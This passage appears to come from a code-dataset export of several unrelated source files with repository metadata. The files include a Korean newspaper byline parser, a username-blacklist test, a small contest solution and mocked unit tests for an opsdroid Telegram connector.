boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소", "문화부 차장"
, "취재2부", "취재1부장", "신문제작국", "스포츠부 차장", "편집부국장", "문화전문기자", "교육전문기자", "사회부장"
]
selfPattern = [
# "([가-힣]{2,4})\\s?\\s?기자\\s?email",
# "\\/\\s?([가-힣]{2,4})\\s?기자\\s?email",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "경향신문" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소", "문화부 차장"
, "취재2부", "취재1부장", "신문제작국", "스포츠부 차장", "편집부국장", "문화전문기자", "교육전문기자", "사회부장", "궁리출판", "논설위원"
]
selfPattern = [
# "([가-힣]{2,4})\\s?\\s?기자\\s?email",
# "\\/\\s?([가-힣]{2,4})\\s?기자\\s?email",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "경인일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소", "문화부 차장"
, "취재2부", "취재1부장", "신문제작국", "스포츠부 차장", "편집부국장", "문화전문기자", "교육전문기자", "사회부장", "궁리출판"
]
selfPattern = [
# "([가-힣]{2,4})\\s?\\s?기자\\s?email",
# "\\/\\s?([가-힣]{2,4})\\s?기자\\s?email",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "경상일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소", "문화부 차장"
, "취재2부", "취재1부장", "신문제작국", "스포츠부 차장", "편집부국장", "문화전문기자", "교육전문기자", "사회부장", "궁리출판"
]
selfPattern = [
# "([가-힣]{2,4})\\s?\\s?기자\\s?email",
# "\\/\\s?([가-힣]{2,4})\\s?기자\\s?email",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "경남신문" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소", "문화부 차장"
, "취재2부", "취재1부장", "신문제작국", "스포츠부 차장", "편집부국장", "문화전문기자", "교육전문기자", "사회부장", "궁리출판"
]
selfPattern = [
"([가-힣]{2,4})\\s?\\s?기자\\s?email",
# "\\/\\s?([가-힣]{2,4})\\s?기자\\s?email",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "경남도민일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소", "문화부 차장"
, "취재2부", "취재1부장", "신문제작국", "스포츠부 차장", "편집부국장", "문화전문기자", "교육전문기자", "사회부장", "궁리출판"
]
selfPattern = [
"([가-힣]{2,4})\\s?\\s?기자\\s?email",
# "\\/\\s?([가-힣]{2,4})\\s?기자\\s?email",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "경기일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소", "문화부 차장"
, "취재2부", "취재1부장", "신문제작국", "스포츠부 차장", "편집부국장", "문화전문기자", "교육전문기자", "사회부장", "궁리출판"
]
selfPattern = [
# "([가-힣]{2,4})\\s?\\s?기자\\s?email",
"=([가-힣]{2,4})\\s?기자",
# "\\/\\s?([가-힣]{2,4})\\s?기자\\s?email",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "강원일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소", "문화부 차장"
, "취재2부", "취재1부장", "신문제작국", "스포츠부 차장", "편집부국장", "문화전문기자", "교육전문기자", "사회부장", "궁리출판"
]
selfPattern = [
# "([가-힣]{2,4})\\s?\\s?기자\\s?email",
"=([가-힣]{2,4})\\s?기자",
# "\\/\\s?([가-힣]{2,4})\\s?기자\\s?email",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "강원도민일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소", "문화부 차장"
, "취재2부", "취재1부장", "신문제작국", "스포츠부 차장", "편집부국장", "문화전문기자", "교육전문기자", "사회부장", "궁리출판"
, "강릉본부장"
]
forceList = [
"([가-힣]{2,4})",
"([가-힣]{2,4})\\s?email",
]
LastExcept = [
"명단", "kado", "첨부파일", "net", "프로필", "관련기사", "▶", "◇"
]
selfPattern = [
"=\\s?([가-힣]{2,4})\\s?기자$",
"([가-힣]{2,4})\\s?email$",
"정리/([가-힣]{2,4})",
"정리:\\s?([가-힣]{2,4})",
# "\\/\\s?([가-힣]{2,4})\\s?기자\\s?email",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, FindForceLast=True,
backContent=False,
ForceList=forceList, LastExcept=LastExcept)
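The `selfPattern` entries above are regexes with one capture group for the reporter's name. As an illustrative sketch, this is how one of them, `=([가-힣]{2,4})\s?기자` (from the 경기일보/강원일보 branches), extracts a byline; the sample article text below is invented for demonstration.

```python
import re

# One of the selfPattern regexes used above: "=" followed by a 2-4
# character Hangul name and an optional space before "기자" (reporter).
reporter_pattern = re.compile("=([가-힣]{2,4})\\s?기자")

# Invented sample text for demonstration only.
match = reporter_pattern.search("...기사 본문 끝=홍길동 기자")
name = match.group(1) if match else None
```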
# 중앙일보
# 아시아경제
# 전북도민일보
# 영남일보 | 50.342508 | 106 | 0.484206 | 3,396 | 32,924 | 4.693757 | 0.064782 | 0.015809 | 0.023714 | 0.031619 | 0.93005 | 0.9234 | 0.920389 | 0.917189 | 0.9 | 0.887265 | 0 | 0.016328 | 0.289424 | 32,924 | 654 | 107 | 50.342508 | 0.664928 | 0.056767 | 0 | 0.59962 | 0 | 0.003795 | 0.321661 | 0.046957 | 0 | 0 | 0 | 0 | 0 | 1 | 0.001898 | false | 0 | 0.001898 | 0 | 0.106262 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
156ab5d4fc44d11dd58bdfae2b07140b6f0d6c4d | 79 | py | Python | Backend/schemas/empty.py | LukasSchmid97/destinyBloodoakStats | 1420802ce01c3435ad5c283f44eb4531d9b22c38 | [
"MIT"
] | 3 | 2019-10-19T11:24:50.000Z | 2021-01-29T12:02:17.000Z | Backend/schemas/empty.py | LukasSchmid97/destinyBloodoakStats | 1420802ce01c3435ad5c283f44eb4531d9b22c38 | [
"MIT"
] | 29 | 2019-10-14T12:26:10.000Z | 2021-07-28T20:50:29.000Z | Backend/schemas/empty.py | LukasSchmid97/destinyBloodoakStats | 1420802ce01c3435ad5c283f44eb4531d9b22c38 | [
"MIT"
] | 2 | 2019-10-13T17:11:09.000Z | 2020-05-13T15:29:04.000Z | from pydantic import BaseModel
class EmptyResponseModel(BaseModel):
    """Schema for endpoints that intentionally return an empty body."""
| 13.166667 | 36 | 0.797468 | 8 | 79 | 7.875 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.164557 | 79 | 5 | 37 | 15.8 | 0.954545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
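For context on `EmptyResponseModel` above, a dependency-free sketch of what the schema expresses: a model with no fields that serializes to an empty object. The dataclass below is only an analogue for illustration; the real file relies on pydantic's `BaseModel`.

```python
from dataclasses import dataclass, asdict

# Stand-in for EmptyResponseModel without the pydantic dependency: no
# fields, so serialization yields an empty dict (pydantic's equivalent
# would be EmptyResponseModel().dict() == {}).
@dataclass
class EmptyResponse:
    pass

serialized = asdict(EmptyResponse())
```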
157a16e31bd5a4a9b1a743753a069ab7fd649d2c | 115 | py | Python | tests/test_list_export.py | marteinn/The-Big-Username-Blacklist-Pymodule | 551b030f5a93c079d70100222332a3f82c50e170 | [
"MIT"
] | 3 | 2015-11-28T09:40:37.000Z | 2020-10-22T02:10:11.000Z | tests/test_list_export.py | marteinn/The-Big-Username-Blacklist-Pymodule | 551b030f5a93c079d70100222332a3f82c50e170 | [
"MIT"
] | 2 | 2015-08-27T06:56:54.000Z | 2018-12-09T11:42:23.000Z | tests/test_list_export.py | marteinn/The-Big-Username-Blacklist-Pymodule | 551b030f5a93c079d70100222332a3f82c50e170 | [
"MIT"
] | 2 | 2017-09-21T03:17:30.000Z | 2018-05-25T13:04:31.000Z | from the_big_username_blacklist import get_blacklist
def test_list_export():
    assert "you" in get_blacklist()
| 19.166667 | 52 | 0.8 | 17 | 115 | 5 | 0.823529 | 0.282353 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.13913 | 115 | 5 | 53 | 23 | 0.858586 | 0 | 0 | 0 | 0 | 0 | 0.026087 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
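A hedged sketch of how a consumer might wrap the blacklist the test above exercises; the helper below is hypothetical (not part of the library) and uses a hard-coded list in place of the real `get_blacklist()` result.

```python
# Hypothetical wrapper around a username blacklist: lookups are
# case-insensitive and O(1) via a set.
def make_validator(blacklist):
    banned = {name.lower() for name in blacklist}
    return lambda username: username.lower() not in banned

# Hard-coded sample entries standing in for get_blacklist().
is_allowed = make_validator(["you", "admin", "root"])
```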
ec6caccbf2562589008645590afbb8544ff3563c | 129 | py | Python | 2020/j1.py | jo3-l/ccc | 65a26a28d8d4189ec9b6bed7682612f3ef7a245c | [
"MIT"
] | null | null | null | 2020/j1.py | jo3-l/ccc | 65a26a28d8d4189ec9b6bed7682612f3ef7a245c | [
"MIT"
] | 1 | 2021-01-22T19:11:52.000Z | 2021-01-22T19:16:28.000Z | 2020/j1.py | jo3-l/ccc | 65a26a28d8d4189ec9b6bed7682612f3ef7a245c | [
"MIT"
] | null | null | null | s, m, l = int(input()), int(input()), int(input())
# Happiness score: small=1, medium=2, large=3 points; 10 or more means "happy".
if (1 * s + 2 * m + 3 * l) >= 10:
    print("happy")
else:
    print("sad")
| 16.125 | 50 | 0.457364 | 22 | 129 | 2.681818 | 0.636364 | 0.40678 | 0.372881 | 0.542373 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.052632 | 0.263566 | 129 | 7 | 51 | 18.428571 | 0.568421 | 0 | 0 | 0 | 0 | 0 | 0.0625 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0.4 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
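The same rule from the `j1.py` script is easier to unit-test as a pure function; a small refactor sketch:

```python
# Happiness rule from the script above: the weighted treat count
# (1 per small, 2 per medium, 3 per large) must reach 10.
def is_happy(small: int, medium: int, large: int) -> bool:
    return small + 2 * medium + 3 * large >= 10

verdict = "happy" if is_happy(3, 2, 1) else "sad"  # 3 + 4 + 3 = 10
```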
ec82c230d36d593f476c4a0849904d337ba49cb0 | 111 | py | Python | tests/test_dfs_spatial_axis.py | DHI/mikecore-python | 04c36b1ee3dc6c81905d75ff8c39d7b8a8411bd7 | [
"BSD-3-Clause"
] | 2 | 2021-06-01T21:06:48.000Z | 2021-06-16T03:49:35.000Z | tests/test_dfs_spatial_axis.py | DHI/mikecore-python | 04c36b1ee3dc6c81905d75ff8c39d7b8a8411bd7 | [
"BSD-3-Clause"
] | 6 | 2021-05-27T10:26:13.000Z | 2022-03-07T09:44:19.000Z | tests/test_dfs_spatial_axis.py | DHI/mikecore-python | 04c36b1ee3dc6c81905d75ff8c39d7b8a8411bd7 | [
"BSD-3-Clause"
] | null | null | null | from mikecore.DfsFileFactory import DfsFileFactory
from mikecore.DfsFile import *
from numpy.testing import *
| 22.2 | 50 | 0.837838 | 13 | 111 | 7.153846 | 0.538462 | 0.258065 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117117 | 111 | 4 | 51 | 27.75 | 0.94898 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
bf15515beb11f720a4a683d884f8e1fbe3df4325 | 30,168 | py | Python | opsdroid/connector/telegram/tests/test_connector_telegram.py | JiahnChoi/opsdroid.kr | 0893456b0f9f6c70edf7c330a7593d87450538cc | [
"Apache-2.0"
] | 712 | 2016-08-09T21:30:07.000Z | 2022-03-24T09:38:21.000Z | opsdroid/connector/telegram/tests/test_connector_telegram.py | JiahnChoi/opsdroid.kr | 0893456b0f9f6c70edf7c330a7593d87450538cc | [
"Apache-2.0"
] | 1,767 | 2016-07-27T13:01:25.000Z | 2022-03-29T04:25:10.000Z | opsdroid/connector/telegram/tests/test_connector_telegram.py | JiahnChoi/opsdroid.kr | 0893456b0f9f6c70edf7c330a7593d87450538cc | [
"Apache-2.0"
] | 536 | 2016-07-31T14:23:41.000Z | 2022-03-22T17:35:15.000Z | import logging
import asyncio
import pytest
import asynctest.mock as amock
from opsdroid.connector.telegram import ConnectorTelegram
import opsdroid.connector.telegram.events as telegram_events
import opsdroid.events as opsdroid_events
connector_config = {
"token": "test:token",
}
def test_init_no_base_url(opsdroid, caplog):
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
caplog.set_level(logging.ERROR)
assert connector.name == "telegram"
assert connector.token == "test:token"
assert connector.whitelisted_users is None
assert connector.webhook_secret is not None
assert connector.base_url is None
assert "Breaking changes introduced" in caplog.text
def test_init(opsdroid):
config = {
"token": "test:token",
"whitelisted-users": ["bob", 1234],
"bot-name": "bot McBotty",
}
connector = ConnectorTelegram(config, opsdroid=opsdroid)
opsdroid.config["web"] = {"base-url": "https://test.com"}
assert connector.name == "telegram"
assert connector.token == "test:token"
assert connector.whitelisted_users == ["bob", 1234]
assert connector.bot_name == "bot McBotty"
assert connector.webhook_secret is not None
def test_get_user_from_channel_with_signature(opsdroid):
response = {
"update_id": 639974076,
"channel_post": {
"message_id": 15,
"author_signature": "Fabio Rosado",
"chat": {"id": -1001474700000, "title": "Opsdroid-test", "type": "channel"},
"date": 1603827365,
"text": "hi",
},
}
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
user, user_id = connector.get_user(response, "")
assert user == "Fabio Rosado"
assert user_id == 15
def test_get_user_from_channel_without_signature(opsdroid):
response = {
"update_id": 639974076,
"channel_post": {
"message_id": 16,
"chat": {"id": -1001474700000, "title": "Opsdroid-test", "type": "channel"},
"date": 1603827365,
"text": "hi",
},
}
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
user, user_id = connector.get_user(response, "Opsdroid!")
assert user == "Opsdroid!"
assert user_id == 16
def test_get_user_from_forwarded_message(opsdroid):
response = {
"update_id": 639974077,
"message": {
"message_id": 31,
"from": {"id": 100000, "is_bot": False, "first_name": "Telegram"},
"chat": {
"id": -10014170000,
"title": "Opsdroid-test Chat",
"type": "supergroup",
},
"date": 1603827368,
"forward_from_chat": {
"id": -10014740000,
"title": "Opsdroid-test",
"type": "channel",
},
"forward_from_message_id": 15,
"forward_signature": "Fabio Rosado",
"forward_date": 1603827365,
"text": "hi",
},
}
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
user, user_id = connector.get_user(response, "Opsdroid!")
assert user == "Fabio Rosado"
assert user_id == 100000
def test_get_user_from_first_name(opsdroid):
response = {
"update_id": 639974077,
"message": {
"message_id": 31,
"from": {"id": 100000, "is_bot": False, "first_name": "Fabio"},
"chat": {
"id": -10014170000,
"title": "Opsdroid-test Chat",
"type": "supergroup",
},
"date": 1603827368,
"text": "hi",
},
}
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
user, user_id = connector.get_user(response, "")
assert user == "Fabio"
assert user_id == 100000
def test_get_user_from_username(opsdroid):
response = {
"update_id": 639974077,
"message": {
"message_id": 31,
"from": {"id": 100000, "is_bot": False, "username": "FabioRosado"},
"chat": {
"id": -10014170000,
"title": "Opsdroid-test Chat",
"type": "supergroup",
},
"date": 1603827368,
"text": "hi",
},
}
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
user, user_id = connector.get_user(response, "")
assert user == "FabioRosado"
assert user_id == 100000
def test_handle_user_permission(opsdroid):
response = {
"update_id": 639974077,
"message": {
"message_id": 31,
"from": {"id": 100000, "is_bot": False, "username": "FabioRosado"},
"chat": {
"id": -10014170000,
"title": "Opsdroid-test Chat",
"type": "supergroup",
},
"date": 1603827368,
"text": "hi",
},
}
connector_config["whitelisted-users"] = ["FabioRosado"]
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
permission = connector.handle_user_permission(response, "FabioRosado", 100000)
assert permission is True
def test_handle_user_id_permission(opsdroid):
response = {
"update_id": 639974077,
"message": {
"message_id": 31,
"from": {"id": 100000, "is_bot": False, "username": "FabioRosado"},
"chat": {
"id": -10014170000,
"title": "Opsdroid-test Chat",
"type": "supergroup",
},
"date": 1603827368,
"text": "hi",
},
}
connector_config["whitelisted-users"] = [100000]
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
permission = connector.handle_user_permission(response, "FabioRosado", 100000)
assert permission is True
def test_handle_user_no_permission(opsdroid):
response = {
"update_id": 639974077,
"message": {
"message_id": 31,
"from": {"id": 100000, "is_bot": False, "username": "FabioRosado"},
"chat": {
"id": -10014170000,
"title": "Opsdroid-test Chat",
"type": "supergroup",
},
"date": 1603827368,
"text": "hi",
},
}
connector_config["whitelisted-users"] = [1, "AllowedUser"]
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
permission = connector.handle_user_permission(response, "FabioRosado", 100000)
assert permission is False
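The three permission tests above pin down the whitelist semantics. Below is a minimal stand-in for the logic they imply, written from the tests rather than from the connector's actual implementation: a user passes if either their username or numeric id is whitelisted, and everyone passes when no whitelist is configured.

```python
# Assumed whitelist check mirroring the three tests above: match on
# either username or numeric user id; an empty or missing whitelist
# means everyone is allowed.
def handle_user_permission(whitelisted_users, user, user_id):
    if not whitelisted_users:
        return True
    return user in whitelisted_users or user_id in whitelisted_users
```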
def test_build_url(opsdroid):
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
url = connector.build_url("getUpdates")
assert url == "https://api.telegram.org/bottest:token/getUpdates"
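The assertion above fixes the URL scheme: the Telegram Bot API prefixes the token with `bot`. A standalone sketch of the equivalent construction (a hypothetical helper mirroring what `build_url` must produce):

```python
# Telegram Bot API URL layout asserted by the test above:
# https://api.telegram.org/bot<token>/<method>
def build_url(token: str, method: str) -> str:
    return f"https://api.telegram.org/bot{token}/{method}"

url = build_url("test:token", "getUpdates")
```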
@pytest.mark.asyncio
async def test_connect(opsdroid):
opsdroid.config["web"] = {"base-url": "https://test.com"}
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
connector.webhook_secret = "test_secret"
opsdroid.web_server = amock.Mock()
response = amock.Mock()
response.status = 200
with amock.patch(
"aiohttp.ClientSession.post", new=amock.CoroutineMock()
) as patched_request, amock.patch.object(
connector, "build_url"
) as mocked_build_url:
patched_request.return_value = asyncio.Future()
patched_request.return_value.set_result(response)
await connector.connect()
assert opsdroid.web_server.web_app.router.add_post.called
assert patched_request is not None
assert mocked_build_url.called
@pytest.mark.asyncio
async def test_connect_failure(opsdroid, caplog):
caplog.set_level(logging.ERROR)
opsdroid.config["web"] = {"base-url": "https://test.com"}
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
connector.webhook_secret = "test_secret"
opsdroid.web_server = amock.Mock()
response = amock.Mock()
response.status = 404
with amock.patch(
"aiohttp.ClientSession.post", new=amock.CoroutineMock()
) as patched_request, amock.patch.object(
connector, "build_url"
) as mocked_build_url:
patched_request.return_value = asyncio.Future()
patched_request.return_value.set_result(response)
await connector.connect()
assert opsdroid.web_server.web_app.router.add_post.called
assert patched_request is not None
assert mocked_build_url.called
assert "Error when connecting to Telegram" in caplog.text
@pytest.mark.asyncio
async def test_respond(opsdroid, caplog):
caplog.set_level(logging.DEBUG)
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
response = amock.Mock()
response.status = 200
with amock.patch(
"aiohttp.ClientSession.post", new=amock.CoroutineMock()
) as patched_request, amock.patch.object(
connector, "build_url"
) as mocked_build_url:
patched_request.return_value = asyncio.Future()
patched_request.return_value.set_result(response)
assert opsdroid.__class__.instances
test_message = opsdroid_events.Message(
text="This is a test",
user="opsdroid",
target={"id": 12404},
connector=connector,
)
patched_request.return_value = asyncio.Future()
patched_request.return_value.set_result(response)
await test_message.respond("Response")
assert patched_request.called
assert mocked_build_url.called
assert "Responding" in caplog.text
assert "Successfully responded" in caplog.text
@pytest.mark.asyncio
async def test_respond_failure(opsdroid, caplog):
caplog.set_level(logging.DEBUG)
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
response = amock.Mock()
response.status = 500
with amock.patch(
"aiohttp.ClientSession.post", new=amock.CoroutineMock()
) as patched_request, amock.patch.object(
connector, "build_url"
) as mocked_build_url:
patched_request.return_value = asyncio.Future()
patched_request.return_value.set_result(response)
assert opsdroid.__class__.instances
test_message = opsdroid_events.Message(
text="This is a test",
user="opsdroid",
target={"id": 12404},
connector=connector,
)
patched_request.return_value = asyncio.Future()
patched_request.return_value.set_result(response)
await test_message.respond("Response")
assert patched_request.called
assert mocked_build_url.called
assert "Responding" in caplog.text
assert "Unable to respond" in caplog.text
@pytest.mark.asyncio
async def test_respond_image(opsdroid, caplog):
caplog.set_level(logging.DEBUG)
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
post_response = amock.Mock()
post_response.status = 200
gif_bytes = (
b"GIF89a\x01\x00\x01\x00\x00\xff\x00,"
b"\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x00;"
)
image = opsdroid_events.Image(file_bytes=gif_bytes, target={"id": "123"})
with amock.patch(
"aiohttp.ClientSession.post", new=amock.CoroutineMock()
) as patched_request, amock.patch.object(
connector, "build_url"
) as mocked_build_url:
patched_request.return_value = asyncio.Future()
patched_request.return_value.set_result(post_response)
await connector.send_image(image)
assert mocked_build_url.called
assert patched_request.called
assert "Sent" in caplog.text
@pytest.mark.asyncio
async def test_respond_image_failure(opsdroid, caplog):
caplog.set_level(logging.DEBUG)
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
post_response = amock.Mock()
post_response.status = 400
gif_bytes = (
b"GIF89a\x01\x00\x01\x00\x00\xff\x00,"
b"\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x00;"
)
image = opsdroid_events.Image(file_bytes=gif_bytes, target={"id": "123"})
with amock.patch(
"aiohttp.ClientSession.post", new=amock.CoroutineMock()
) as patched_request, amock.patch.object(
connector, "build_url"
) as mocked_build_url:
patched_request.return_value = asyncio.Future()
patched_request.return_value.set_result(post_response)
await connector.send_image(image)
assert mocked_build_url.called
assert patched_request.called
assert "Unable to send image" in caplog.text
@pytest.mark.asyncio
async def test_respond_file(opsdroid, caplog):
caplog.set_level(logging.DEBUG)
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
post_response = amock.Mock()
post_response.status = 200
file_bytes = b"plain text file example"
file = opsdroid_events.File(file_bytes=file_bytes, target={"id": "123"})
with amock.patch(
"aiohttp.ClientSession.post", new=amock.CoroutineMock()
) as patched_request, amock.patch.object(
connector, "build_url"
) as mocked_build_url:
patched_request.return_value = asyncio.Future()
patched_request.return_value.set_result(post_response)
await connector.send_file(file)
assert mocked_build_url.called
assert patched_request.called
assert "Sent" in caplog.text
@pytest.mark.asyncio
async def test_respond_file_failure(opsdroid, caplog):
caplog.set_level(logging.DEBUG)
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
post_response = amock.Mock()
post_response.status = 400
file_bytes = b"plain text file example"
file = opsdroid_events.File(file_bytes=file_bytes, target={"id": "123"})
with amock.patch(
"aiohttp.ClientSession.post", new=amock.CoroutineMock()
) as patched_request, amock.patch.object(
connector, "build_url"
) as mocked_build_url:
patched_request.return_value = asyncio.Future()
patched_request.return_value.set_result(post_response)
await connector.send_file(file)
assert mocked_build_url.called
assert patched_request.called
assert "Unable to send file" in caplog.text
@pytest.mark.asyncio
async def test_disconnect_successful(opsdroid, caplog):
caplog.set_level(logging.DEBUG)
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
response = amock.Mock()
response.status = 200
with amock.patch(
"aiohttp.ClientSession.get", new=amock.CoroutineMock()
) as patched_request, amock.patch.object(
connector, "build_url"
) as mocked_build_url:
